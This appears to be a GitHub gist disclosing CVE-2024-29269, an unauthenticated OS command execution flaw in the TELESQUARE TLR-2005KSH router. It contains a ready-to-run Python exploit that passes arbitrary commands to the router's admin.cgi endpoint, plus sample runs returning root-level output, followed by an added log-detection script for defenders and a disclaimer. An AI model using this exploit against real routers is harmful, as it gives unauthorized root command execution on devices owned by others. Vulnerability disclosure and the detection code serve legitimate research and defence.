@win3zz
Created April 3, 2024 14:50
CVE-2024-29269: TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution

TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution

PoC

File: script.py

import sys
import requests
import xml.etree.ElementTree as ET


def get_systemutil_response(url, command, proxy):
    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
    full_url = url.rstrip('/') + endpoint
    headers = {
        'Referer': url,
    }
    try:
        response = requests.get(full_url, headers=headers, proxies=proxy)
        if response.status_code == 200:
            print("Response from", full_url)
            #print(response.text)
            root = ET.fromstring(response.text)
            for cmd_result in root.findall('CmdResult'):
                data = cmd_result.text.strip()
                print(data)
        else:
            print("Error: Failed to fetch data. Status code:", response.status_code)
    except requests.exceptions.RequestException as e:
        print("Error:", e)

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url = sys.argv[1]
    command = sys.argv[2]
    proxy = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    get_systemutil_response(url, command, proxy)

To run the script, use the following commands:

bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x    1 1000     1000       xxxxxx web
-rwxrwxr-x    1 1000     1000        xxxxx update.cgi
-rwxrwxr-x    1 1000     1000        xxxxx lte.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportTrafficLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx nms.cgi
-rwxrwxr-x    1 1000     1000        xxxxx admin.cgi
-rwxrwxr-x    1 1000     1000        xxxxx bip.cgi
-rwxrwxr-x    1 1000     1000        xxxxx systemutil.cgi
-rwxrwxr-x    1 1000     1000        xxxxx wireless.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportvpnLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx serialmodem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx modem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx traffic.cgi
-rwxrwxr-x    1 1000     1000        xxxxx firewall.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportSettings.sh
-rwxrwxr-x    1 1000     1000        xxxxx serial.cgi
-rwxrwxr-x    1 1000     1000        xxxxx gmmp.cgi
-rwxrwxr-x    1 1000     1000        xxxxx internet.cgi
-rw-r--r--    1 0        0               0 xx.txt
-rw-r--r--    1 0        0              xx xxyyzz.txt
-rwxrwxrwx    1 0        0         xxxxxxx linux-mips
drwxrwxr-x   21 1000     1000            0 ..
drwxrwxr-x    2 1000     1000            0 .
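
For defenders, the request shape the PoC sends (`/cgi-bin/admin.cgi` with `Command=sysCommand` and a `Cmd` value) can be searched for in web or proxy access logs. The following is an added example, not part of the original gist; it assumes combined-format log lines, and the sample entries (addresses, timestamps, sizes and the `otherCommand` value) are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Source address, request target and status from a combined-format log line
# (assumed format; adjust the pattern to the log source actually in use).
LINE_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def find_syscommand_requests(lines):
    """Return (source, status, decoded Cmd) for requests shaped like the PoC's."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Decode the path so percent-encoded spellings of admin.cgi still match.
        if not unquote(parts.path).lower().endswith("/cgi-bin/admin.cgi"):
            continue
        # parse_qs percent-decodes values; names and the Command value are
        # compared case-insensitively as a conservative detection choice.
        query = parse_qs(parts.query, keep_blank_values=True)
        params = {k.lower(): v for k, v in query.items()}
        if any(v.lower() == "syscommand" for v in params.get("command", [])):
            cmd = params.get("cmd", [""])[0]
            hits.append((m.group("src"), int(m.group("status")), cmd))
    return hits


# Constructed sample entries (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Apr/2024:14:50:01 +0000] "GET /cgi-bin/admin.cgi'
    '?Command=sysCommand&Cmd=id HTTP/1.1" 200 112 "http://192.0.2.1/" "python-requests/2.31.0"',
    '198.51.100.7 - - [03/Apr/2024:14:50:09 +0000] "GET /cgi-bin/admin.cgi'
    '?Command=sysCommand&Cmd=ls%20-al HTTP/1.1" 200 1490 "-" "python-requests/2.31.0"',
    '192.0.2.50 - - [03/Apr/2024:14:51:30 +0000] "GET /cgi-bin/admin.cgi'
    '?Command=otherCommand HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [03/Apr/2024:14:51:31 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for src, status, cmd in find_syscommand_requests(SAMPLE_LOG):
        print(f"{src} status={status} Cmd={cmd!r}")
```

A hit whose status is 200 from a client that never authenticated is the case to triage first, since that is the response the PoC output above shows.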

Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.
